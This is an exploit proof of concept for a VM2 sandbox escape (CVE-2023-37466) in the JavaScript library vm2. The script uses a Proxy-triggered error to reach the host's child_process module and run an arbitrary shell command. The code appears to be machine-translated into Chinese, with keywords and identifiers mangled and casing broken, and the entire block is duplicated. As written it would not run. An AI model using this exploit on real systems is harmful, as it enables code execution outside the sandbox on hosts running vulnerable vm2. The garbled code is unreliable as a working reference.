/*
#利用标题: VM2沙盒逃生漏洞
#日期: 23/12/2023
#利用作者: Calil Khalil Adriel MC Roberts
#供应商homepage: https://github.com/patriksimek/vm2
#软件link: https://github.com/patriksimek/vm2
#版本: VM2=3.9.19
#测试在: Ubuntu 22.04
#CVE : CVE-2023-37466
*/
const {vm}=require('vm2');
const vm=new VM();
const命令='pwd'; //更改为所需命令
const代码=`
异步函数fn(){
(函数stack(){
新错误()。堆栈;
堆();
})();
}
尝试{
const handler={
getPrototypeof(target){
(函数stack(){
新错误()。堆栈;
堆();
})();
}
};
const proxiederr=new Proxy({},Handler);
扔原位;
} catch({constructor: c}){
const childProcess=C.Constructor('return Process')()。mainModule.Require('child_process');
childprocess.execsync('$ {command}');
}
`;
console.log(vm.run(code));
#利用标题: VM2沙盒逃生漏洞
#日期: 23/12/2023
#利用作者: Calil Khalil Adriel MC Roberts
#供应商homepage: https://github.com/patriksimek/vm2
#软件link: https://github.com/patriksimek/vm2
#版本: VM2=3.9.19
#测试在: Ubuntu 22.04
#CVE : CVE-2023-37466
*/
const {vm}=require('vm2');
const vm=new VM();
const命令='pwd'; //更改为所需命令
const代码=`
异步函数fn(){
(函数stack(){
新错误()。堆栈;
堆();
})();
}
尝试{
const handler={
getPrototypeof(target){
(函数stack(){
新错误()。堆栈;
堆();
})();
}
};
const proxiederr=new Proxy({},Handler);
扔原位;
} catch({constructor: c}){
const childProcess=C.Constructor('return Process')()。mainModule.Require('child_process');
childprocess.execsync('$ {command}');
}
`;
console.log(vm.run(code));